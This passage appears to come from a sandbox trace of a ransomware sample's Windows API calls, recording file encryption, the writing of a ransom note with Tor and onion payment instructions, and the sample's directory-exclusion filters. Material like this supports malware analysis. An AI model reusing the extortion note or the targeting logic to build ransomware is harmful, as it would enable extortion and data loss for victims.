uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD9C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd9c.tmp")) returned 0xfd9c [0166.422] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD9C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd9c.tmp"), dwFlags=0x1) returned 0 [0166.422] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD9C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd9c.tmp")) returned 1 [0166.422] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0166.422] wcslen (_String="OK") returned 0x2 [0166.422] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.422] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.422] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0166.422] CryptDestroyHash (hHash=0x9ad178) returned 1 [0166.422] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0166.422] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0166.422] GetLastError () returned 0x12 [0166.422] FindClose (in: hFindFile=0x9ad238 | out: hFindFile=0x9ad238) returned 1 [0166.423] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0166.423] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0166.423] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0166.424] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.424] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.424] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.424] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.424] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.424] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*.exe") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*.dll") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*.lnk") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*.bat") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*.ini") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*.msi") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*.scf") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*pagefile.sys*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*AppData*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*\\winrar\\*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*\\java\\*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*\\windows\\*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*\\ESET\\*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*\\AVG\\*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*Atheros*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*Realtek*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*bootmgr*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*boot*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*boot*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*IO.SYS*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*ntldr*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*chrome*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*opera*") returned 0 [0166.424] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", pszSpec="*firefox*") returned 0 [0166.424] wcslen (_String="\\\\?\\") returned 0x4 [0166.424] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad1f8 [0166.425] wcscmp (_String1=".", _String2=".") returned 0 [0166.425] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.425] wcscmp (_String1="..", _String2=".") returned 1 [0166.425] wcscmp (_String1="..", _String2="..") returned 0 [0166.425] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.425] wcscmp (_String1="en-US", _String2=".") returned 1 [0166.425] wcscmp (_String1="en-US", _String2="..") returned 1 [0166.425] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0166.425] GetLastError () returned 0x12 [0166.425] FindClose (in: hFindFile=0x9ad1f8 | out: hFindFile=0x9ad1f8) returned 1 [0166.425] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.425] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.425] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.425] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.425] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.425] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.425] wcslen (_String="\\\\?\\") returned 0x4 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*.exe") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*.dll") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*.lnk") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*.bat") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*.ini") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*.msi") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*.scf") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*pagefile.sys*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*AppData*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*\\winrar\\*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*\\java\\*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*\\windows\\*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*\\ESET\\*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*\\AVG\\*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*Atheros*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*Realtek*") returned 0 [0166.425] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*bootmgr*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*boot*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*boot*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*IO.SYS*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*ntldr*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*chrome*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*opera*") returned 0 [0166.426] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", pszSpec="*firefox*") returned 0 [0166.426] wcslen (_String="\\\\?\\") returned 0x4 [0166.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\en-US\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad878 [0166.426] wcscmp (_String1=".", _String2=".") returned 0 [0166.426] FindNextFileW (in: hFindFile=0x9ad878, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0166.426] wcscmp (_String1="..", _String2=".") returned 1 [0166.426] wcscmp (_String1="..", _String2="..") returned 0 [0166.426] FindNextFileW (in: hFindFile=0x9ad878, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0166.426] GetLastError () returned 0x12 [0166.426] FindClose (in: hFindFile=0x9ad878 | out: hFindFile=0x9ad878) returned 1 [0166.426] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.426] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.426] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.426] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.426] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.427] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*.exe") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*.dll") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*.lnk") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*.bat") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*.ini") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*.msi") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*.scf") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*pagefile.sys*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*AppData*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*\\winrar\\*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*\\java\\*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*\\windows\\*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*\\ESET\\*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*\\AVG\\*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*Atheros*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*Realtek*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*bootmgr*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*boot*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*boot*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*IO.SYS*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*ntldr*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*chrome*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*opera*") returned 0 [0166.427] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", pszSpec="*firefox*") returned 0 [0166.427] wcslen (_String="\\\\?\\") returned 0x4 [0166.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad5b8 [0166.427] wcscmp (_String1=".", _String2=".") returned 0 [0166.427] FindNextFileW (in: hFindFile=0x9ad5b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.427] wcscmp (_String1="..", _String2=".") returned 1 [0166.427] wcscmp (_String1="..", _String2="..") returned 0 [0166.427] FindNextFileW (in: hFindFile=0x9ad5b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.428] wcscmp (_String1="en-US", _String2=".") returned 1 [0166.428] wcscmp (_String1="en-US", _String2="..") returned 1 [0166.428] FindNextFileW (in: hFindFile=0x9ad5b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0166.428] GetLastError () returned 0x12 [0166.428] FindClose (in: hFindFile=0x9ad5b8 | out: hFindFile=0x9ad5b8) returned 1 [0166.428] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.428] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.428] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.428] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.428] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.428] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.428] wcslen (_String="\\\\?\\") returned 0x4 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*.exe") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*.dll") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*.lnk") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*.bat") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*.ini") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*.msi") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*.scf") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*pagefile.sys*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*AppData*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*\\winrar\\*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*\\java\\*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*\\windows\\*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*\\ESET\\*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*\\AVG\\*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*Atheros*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*Realtek*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*bootmgr*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*boot*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*boot*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*IO.SYS*") returned 0 [0166.428] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*ntldr*") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*chrome*") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*opera*") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", pszSpec="*firefox*") returned 0 [0166.429] wcslen (_String="\\\\?\\") returned 0x4 [0166.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad7b8 [0166.429] wcscmp (_String1=".", _String2=".") returned 0 [0166.429] FindNextFileW (in: hFindFile=0x9ad7b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0166.429] wcscmp (_String1="..", _String2=".") returned 1 [0166.429] wcscmp (_String1="..", _String2="..") returned 0 [0166.429] FindNextFileW (in: hFindFile=0x9ad7b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0166.429] GetLastError () returned 0x12 [0166.429] FindClose (in: hFindFile=0x9ad7b8 | out: hFindFile=0x9ad7b8) returned 1 [0166.429] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.429] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.429] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.429] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.429] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.429] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*.exe") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*.dll") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*.lnk") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*.bat") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*.ini") returned 0 [0166.429] PathMatchSpecW 